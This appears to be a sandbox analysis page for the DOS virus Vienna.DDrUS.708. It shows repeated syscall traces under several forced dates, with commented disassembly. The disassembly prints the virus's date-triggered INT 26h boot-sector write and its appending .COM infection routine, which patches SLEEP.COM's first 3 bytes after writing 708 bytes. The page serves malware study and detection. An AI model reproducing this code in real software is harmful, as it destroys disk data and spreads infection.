Sample viewer

vx.netlux.org/Virus.DOS.Vienna.DDrUS.708


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:11:29.383154076Z 48 PC: 12a6b | Get DOS version
2018-12-17T23:11:29.38538922Z 47 PC: 12a77 | Get disk transfer address
2018-12-17T23:11:29.386917825Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-17T23:11:29.388294073Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
; Disassembly window at the return address of the second "Get date" query
; (INT 21h, AH=2Ah: DH = month, DL = day). Static window, not an executed path.
; Remaining date gate: month >= 6, then day >= 22; a failing test jumps to 0x12ace.
; When both pass, one sector is written with INT 26h (DOS absolute disk write).
2018-12-17T23:11:29.391331435Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6 (signed compare): continue with the day
0x12aac: jmp 0x12ace    ; earlier month: skip the disk write
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: fall into the disk write
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; INT 26h input: AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; DS:BX = source buffer, both words loaded from data at [di+...]
0x12ac6: mov bx, word ptr [di + 0x63]    ; buffer contents are not visible on this page
0x12ac9: int 0x26    ; absolute disk write, bypasses the file system
0x12acb: jmp 0x12ace    ; rejoin the common path
0x12acd: nop
0x12ace: pop si    ; common path: reload SI from the top of the stack...
0x12acf: push si    ; ...and put the value back, leaving the stack unchanged
; Disassembly window at the return address of the third "Get date" query
; (INT 21h, AH=2Ah: DL = day). Static window, not an executed path.
; Last date test: day >= 22 leads to the INT 26h sector write, otherwise 0x12ace.
; From 0x12ace on, the code starts a byte scan whose purpose is not visible here.
2018-12-17T23:11:29.398626505Z 42 PC: 12ab3 | Get date 0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22 (signed compare): fall into the disk write
0x12ab8: jmp 0x12ace    ; earlier day: skip the disk write
0x12aba: nop
0x12abb: mov al, 1    ; INT 26h input: AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; DS:BX = source buffer, both words loaded from data at [di+...]
0x12ac6: mov bx, word ptr [di + 0x63]    ; buffer contents are not visible on this page
0x12ac9: int 0x26    ; absolute disk write, bypasses the file system
0x12acb: jmp 0x12ace    ; rejoin the common path
0x12acd: nop
0x12ace: pop si    ; common path: reload SI from the top of the stack...
0x12acf: push si    ; ...and put the value back, leaving the stack unchanged
0x12ad0: add si, 0x31    ; SI now points 0x31 bytes past that base
0x12ad3: nop
0x12ad4: lodsb al, byte ptr [si]    ; AL = the byte stored there
0x12ad5: mov cx, 0x8000    ; scan limit of 32768 bytes
0x12ad8: repne scasb al, byte ptr es:[di]    ; search ES:DI for that byte; ES:DI are set outside this window
0x12ada: mov cx, 4    ; NOTE(review): looks like the length of a following compare - confirm
2018-12-17T23:11:29.402120978Z 78 PC: 12b51 | Find first file
2018-12-17T23:11:29.409330958Z 67 PC: 12b8f | Get or set file attributes
2018-12-17T23:11:29.416757155Z 67 PC: 12ba1 | Get or set file attributes
2018-12-17T23:11:29.43298218Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:11:29.440485632Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-17T23:11:29.443245974Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-17T23:11:29.446036031Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:11:29.454028472Z 66 PC: 12be9 | Move file pointer
2018-12-17T23:11:29.456525008Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-17T23:11:29.46671892Z 66 PC: 12c20 | Move file pointer
2018-12-17T23:11:29.468567727Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:11:29.476800782Z 87 PC: 12c42 | Get or set file date and time
2018-12-17T23:11:29.478988897Z 62 PC: 12c46 | Close file
2018-12-17T23:11:29.488355533Z 67 PC: 12c55 | Get or set file attributes
2018-12-17T23:11:29.501182437Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.398500399Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.39999201Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.400939441Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:10.401816239Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
2018-12-25T12:55:10.404356009Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.41007644Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.41527315Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.435171846Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.441477302Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:10.442623978Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:10.44503455Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.451068279Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.452261339Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.460330306Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.461857842Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.468000962Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.469385735Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.477423199Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.4870369Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.512372646Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.513901383Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.515603809Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:10.517173481Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
; Disassembly window at the return address of the second "Get date" query
; (INT 21h, AH=2Ah: DH = month, DL = day). Static window, not an executed path.
; Remaining date gate: month >= 6, then day >= 22; a failing test jumps to 0x12ace.
; When both pass, one sector is written with INT 26h (DOS absolute disk write).
2018-12-25T12:55:10.51991086Z 42 PC: 12aa7 | Get date 0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6 (signed compare): continue with the day
0x12aac: jmp 0x12ace    ; earlier month: skip the disk write
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: fall into the disk write
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; INT 26h input: AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; DS:BX = source buffer, both words loaded from data at [di+...]
0x12ac6: mov bx, word ptr [di + 0x63]    ; buffer contents are not visible on this page
0x12ac9: int 0x26    ; absolute disk write, bypasses the file system
0x12acb: jmp 0x12ace    ; rejoin the common path
0x12acd: nop
0x12ace: pop si    ; common path: reload SI from the top of the stack...
0x12acf: push si    ; ...and put the value back, leaving the stack unchanged
2018-12-25T12:55:10.523971274Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.531143427Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.537342859Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.560886058Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.56853846Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:10.570182166Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:10.573149924Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.580402834Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.582208483Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.592185624Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.593802452Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.601684899Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.60349235Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.612909379Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.624310206Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.534353086Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.536384598Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.537444019Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:10.538453248Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
2018-12-25T12:55:10.540720245Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.546762398Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.552128723Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.568278592Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.575162607Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:10.576364848Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:10.578312102Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.585044737Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.586344818Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.594459188Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.596096435Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.6027179Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.604059059Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.611811886Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.621272807Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":6,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.616321456Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.617766251Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.618887616Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:10.619875376Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
2018-12-25T12:55:10.622591864Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.628647489Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.634284625Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.6502807Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.657123961Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:10.658750245Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
0x12bcf: mov dx, 0x21
0x12bd2: nop
0x12bd3: add dx, si    ; buffer offset = si + 0x21
0x12bd5: int 0x21
0x12bd7: jb 0x12c2f    ; carry set = DOS error
0x12bd9: cmp ax, 3    ; AX = bytes actually read
0x12bdc: jne 0x12c2f    ; fewer than 3 bytes: take the same exit
0x12bde: mov ax, 0x4202    ; AH=42h, AL=02h: move file pointer relative to end of file
0x12be1: mov cx, 0
0x12be4: mov dx, 0    ; offset 0 from the end, so DX:AX returns the file length
0x12be7: int 0x21
0x12be9: jb 0x12c2f
0x12beb: mov cx, ax    ; keep the low word of the length
0x12bed: sub ax, 3
0x12bf0: mov word ptr [si + 0x25], ax    ; length - 3; presumably the displacement of a 3-byte near jmp - confirm
2018-12-25T12:55:10.661301345Z 63 PC: 12bd7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:55:10.667578141Z 66 PC: 12be9 | Move file pointer
2018-12-25T12:55:10.668844879Z 64 PC: 12c0e | Write file or device (Write 708 bytes on handle 5)
2018-12-25T12:55:10.67695583Z 66 PC: 12c20 | Move file pointer
2018-12-25T12:55:10.678532017Z 64 PC: 12c2f | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:55:10.685144549Z 87 PC: 12c42 | Get or set file date and time
2018-12-25T12:55:10.686483789Z 62 PC: 12c46 | Close file
2018-12-25T12:55:10.697191725Z 67 PC: 12c55 | Get or set file attributes
2018-12-25T12:55:10.706709512Z 26 PC: 12c62 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17205,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:55:10.721927568Z 48 PC: 12a6b | Get DOS version
2018-12-25T12:55:10.723303057Z 47 PC: 12a77 | Get disk transfer address
2018-12-25T12:55:10.724380482Z 26 PC: 12a8a | Set disk transfer address
; Disassembly window at the return address of "Get date" (INT 21h, AH=2Ah returns
; CX = year, DH = month, DL = day). It is a static window, not an executed path.
; Date gate: year >= 1995, month >= 6 and day >= 22 are tested one after another;
; the first failing test jumps to 0x12ace and bypasses the disk-write set-up at 0x12abb.
2018-12-25T12:55:10.725196226Z 42 PC: 12a9a | Get date 0x12a9a: cmp cx, 0x7cb    ; 0x7cb = 1995, compared with the year
0x12a9e: jge 0x12aa3    ; year >= 1995 (signed compare): continue with the month
0x12aa0: jmp 0x12ace    ; earlier year: skip the disk write
0x12aa2: nop
0x12aa3: mov ah, 0x2a    ; AH=2Ah: ask DOS for the date again
0x12aa5: int 0x21
0x12aa7: cmp dh, 6    ; month compared with 6
0x12aaa: jge 0x12aaf    ; month >= 6: continue with the day
0x12aac: jmp 0x12ace
0x12aae: nop
0x12aaf: mov ah, 0x2a    ; third date query
0x12ab1: int 0x21
0x12ab3: cmp dl, 0x16    ; 0x16 = 22, compared with the day of month
0x12ab6: jge 0x12abb    ; day >= 22: all three tests passed
0x12ab8: jmp 0x12ace
0x12aba: nop
0x12abb: mov al, 1    ; register set-up matching DOS INT 26h (absolute disk write): AL = drive 1 (0 = A:)
0x12abd: mov cx, 1    ; CX = 1 sector
0x12ac0: mov dx, 0    ; DX = first logical sector 0 (the volume's boot sector)
0x12ac3: mov ds, word ptr [di + 0x37]    ; buffer segment; window ends here, other traces on this page show int 0x26 at 0x12ac9
2018-12-25T12:55:10.727148341Z 78 PC: 12b51 | Find first file
2018-12-25T12:55:10.733036748Z 67 PC: 12b8f | Get or set file attributes
2018-12-25T12:55:10.738525977Z 67 PC: 12ba1 | Get or set file attributes
2018-12-25T12:55:10.757144912Z 61 PC: 12bac | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:55:10.763642452Z 87 PC: 12bb8 | Get or set file date and time
; Disassembly window at the return address of "Get time" (INT 21h, AH=2Ch: DH = seconds).
; Visible logic: read the first 3 bytes of the opened file, seek to its end to learn the
; length, and store length - 3 at [si+0x25]. A DOS error (carry) or short read jumps to 0x12c2f.
; With the 708-byte and 3-byte writes logged after it, this is consistent with an appending
; .COM infector that patches the host's first 3 bytes - inferred from the log, confirm.
2018-12-25T12:55:10.764824286Z 44 PC: 12bc4 | Get time 0x12bc4: and dh, 7    ; low 3 bits of the seconds; the result is not tested in this window
0x12bc7: jmp 0x12bca    ; unconditional, only steps over the nop
0x12bc9: nop
0x12bca: mov ah, 0x3f    ; AH=3Fh: read from file handle (BX is set outside this window)
0x12bcc: mov cx, 3    ; 3 bytes
